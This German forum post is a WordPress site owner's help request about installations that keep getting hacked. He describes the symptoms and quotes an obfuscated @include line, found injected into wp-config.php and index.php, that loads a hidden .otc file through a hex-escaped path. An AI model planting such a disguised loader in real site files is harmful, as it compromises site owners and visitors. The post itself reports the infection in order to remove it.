WordPress Installationen ständig gehackt
-
Hallo,
ich melde mich hier mal, weil ich auf ein paar (längst nicht allen) WP-Installationen ein wiederkehrendes Problem habe: Sie werden offensichtlich regelmäßig gehackt, aber ich weiß nicht, ob von innen oder außen.
Zunächst war es mir gar nicht aufgefallen. Meist machen diese Veränderungen an den WP-Dateien keine Auffälligkeiten. Bei der letzten Installation allerdings schon. Da ging plötzlich der Medienbrowser nicht mehr, es ließen sich keine weiteren Themes mehr hinzufügen und Elementor gab einen 500er Serverfehler aus, funktionierte danach aber stets reibungslos.
Zuerst dachte ich, es hinge mit dem Update auf 6.3. zusammen und habe 6.2.2 zurück installiert. Danach lief erst einmal alles wieder. Am nächsten Tag das gleiche Problem. Lag also eher nicht am Update.
Dann stellte ich fest, dass die wp-config und die index.php folgenden Code enthielten:
/bdf59/
@include („/var/www/vhosts/host\x2da.de/team.host\x2da.de/w\x70\x2dincludes/blocks/file/.f568af4f.otc“);
/bdf59/
Es gibt dieses Verzeichnis jedoch gar nicht auf meinem Server.
Zudem werden haufenweise Verzeichnisse und Dateien angelegt, die teilweise html-texte und teilweise verschlüsselten code enthalten. Lösche ich sie und überschreibe wp-admin und wp-includes mit einer sauberen Version, ist das Problem für einige Stunden behoben. Es kommt aber wieder.
Es sind stets die Subdomains von zwei meiner Domains betroffen.
Eingrenzung des Problems:
Es liegt nicht an Plugins und Themes. Ich arbeite meist mit oceanwp und nur einer handvoll Plugins. Ich habe mehrfach mein Adminpassword geändert.
Wäre echt cool, wenn jemand wüsste, was das ist.
Danke und Grüße
Holger
- Das Thema „WordPress Installationen ständig gehackt“ ist für neue Antworten geschlossen.